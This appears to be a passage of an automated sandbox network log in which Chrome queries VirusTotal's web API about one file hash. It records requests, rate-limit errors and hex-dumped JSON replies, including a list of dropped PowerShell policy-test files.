                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC241INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 5d 2c 0a 20 20 20 20 22 6d 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 30 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 2f 76 6f 74 65 73 3f 6c 69 6d 69 74 3d 31 30 26 72 65 6c 61 74 69 6f 6e 73 68 69 70 73 3d 69 74 65 6d 25 32 43 76 6f 74 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": [], "meta": { "count": 0 }, "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/votes?limit=10&relationships=item%2Cvoter" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    223192.168.2.164998274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC571OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_children HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: aaab60e0666d84bbb74382975da3360f
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    224192.168.2.164998374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC980OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/comments?relationships=item%2Cauthor HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTM2NjgyMDMwNjYtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU2LjMzMg==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 4acf462e2ca316a6b65edd405c5d964d
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 245
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC245INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 5d 2c 0a 20 20 20 20 22 6d 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 30 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 2f 63 6f 6d 6d 65 6e 74 73 3f 6c 69 6d 69 74 3d 31 30 26 72 65 6c 61 74 69 6f 6e 73 68 69 70 73 3d 69 74 65 6d 25 32 43 61 75 74 68 6f 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": [], "meta": { "count": 0 }, "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/comments?limit=10&relationships=item%2Cauthor" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    225192.168.2.164998474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC568OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_domains HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 8d86b153c917a3346811160d5b683d51
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    226192.168.2.164998674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC570OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mbc_trees HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: f489237cb5928a5b53136bf4a49e7acd
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    227192.168.2.164998574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC990OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/graphs?relationships=owner%2Cviewers%2Ceditors HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTc1NzkwODQ3NTEtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU2LjMzMg==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:56:00 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: e4ff5355971d671ae4f5cde28d2f91b8
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:56:00 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 255
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:00 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:56:00 UTC255INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 5d 2c 0a 20 20 20 20 22 6d 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 30 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 2f 67 72 61 70 68 73 3f 6c 69 6d 69 74 3d 31 30 26 72 65 6c 61 74 69 6f 6e 73 68 69 70 73 3d 6f 77 6e 65 72 25 32 43 76 69 65 77 65 72 73 25 32 43 65 64 69 74 6f 72 73 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": [], "meta": { "count": 0 }, "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/graphs?limit=10&relationships=owner%2Cviewers%2Ceditors" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    228192.168.2.164998774.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1010OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTE5NTUzODAwNTgtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU2Ljk1MQ==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 44aeff63dcd775344f9e676cfd5c5cb1
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 163209
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 39 36 61 64 31 31 34 36 65 62 39 36 38 37 37 65 61 62 35 39 34 32 61 65 30 37 33 36 62 38 32 64 38 62 35 65 32 30 33 39 61 38 30 64 33 64 36 39 33 32 36 36 35 63 31 61 34 63 38 37 64 63 66 37 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 39 36 61 64 31 31 34 36 65 62 39 36 38 37 37 65 61 62 35 39 34 32 61 65 30 37 33 36 62 38 32
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7", "type": "file", "links": { "self": "https://www.virustotal.com/ui/files/96ad1146eb96877eab5942ae0736b82
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5f 5f 50 53 53 63 72 69 70 74 50 6f 6c 69 63 79 54 65 73 74 5f 33 6a 32 6b 6d 76 79 62 2e 6c 34 78 2e 70 73 6d 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5f 5f 50 53 53 63 72 69 70 74 50 6f 6c 69 63 79 54 65 73 74 5f 6a 63 32 76 33 66 6d 72 2e 65 6d 73 2e 70 73 6d 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5f 5f 50 53 53 63 72 69 70 74 50 6f 6c 69 63 79 54 65 73 74 5f 6e 32 69 70 32 63 64 67 2e 64 62 67 2e 70 73 6d 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5f 5f 50 53 53 63 72 69 70 74 50 6f 6c 69 63 79 54 65 73 74 5f 70 77 6c 74 64 68 6c 31 2e 72 7a 34 2e 70 73 6d 31 22 2c 0a 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: ", "__PSScriptPolicyTest_3j2kmvyb.l4x.psm1", "__PSScriptPolicyTest_jc2v3fmr.ems.psm1", "__PSScriptPolicyTest_n2ip2cdg.dbg.psm1", "__PSScriptPolicyTest_pwltdhl1.rz4.psm1",
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC547INData Raw: 34 65 71 6c 7a 71 34 76 2e 6e 7a 75 2e 70 73 6d 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5f 5f 50 53 53 63 72 69 70 74 50 6f 6c 69 63 79 54 65 73 74 5f 6a 72 68 31 75 73 6a 75 2e 77 63 35 2e 70 73 6d 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5f 5f 50 53 53 63 72 69 70 74 50 6f 6c 69 63 79 54 65 73 74 5f 70 72 66 79 35 32 79 6c 2e 6f 7a 61 2e 70 73 6d 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5f 5f 50 53 53 63 72 69 70 74 50 6f 6c 69 63 79 54 65 73 74 5f 69 61 75 30 6a 65 33 79 2e 34 35 77 2e 70 73 6d 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5f 5f 50 53 53 63 72 69 70 74 50 6f 6c 69 63 79 54 65 73 74 5f 6d 6a 79 77 72 61 72
                                                                                                                                                                                                                    Data Ascii: 4eqlzq4v.nzu.psm1", "__PSScriptPolicyTest_jrh1usju.wc5.psm1", "__PSScriptPolicyTest_prfy52yl.oza.psm1", "__PSScriptPolicyTest_iau0je3y.45w.psm1", "__PSScriptPolicyTest_mjywrar
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 50 6f 6c 69 63 79 54 65 73 74 5f 6f 35 77 68 69 33 32 6c 2e 65 6b 6d 2e 70 73 6d 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5f 5f 50 53 53 63 72 69 70 74 50 6f 6c 69 63 79 54 65 73 74 5f 7a 77 71 6a 61 6e 62 6c 2e 68 62 32 2e 70 73 6d 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5f 5f 50 53 53 63 72 69 70 74 50 6f 6c 69 63 79 54 65 73 74 5f 79 6f 71 66 62 75 6a 32 2e 6c 7a 76 2e 70 73 6d 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5f 5f 50 53 53 63 72 69 70 74 50 6f 6c 69 63 79 54 65 73 74 5f 75 69 64 32 78 32 6c 6b 2e 32 75 33 2e 70 73 6d 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 5f 5f 50 53 53 63 72 69 70 74 50 6f 6c 69 63 79 54
                                                                                                                                                                                                                    Data Ascii: PolicyTest_o5whi32l.ekm.psm1", "__PSScriptPolicyTest_zwqjanbl.hb2.psm1", "__PSScriptPolicyTest_yoqfbuj2.lzv.psm1", "__PSScriptPolicyTest_uid2x2lk.2u3.psm1", "__PSScriptPolicyT
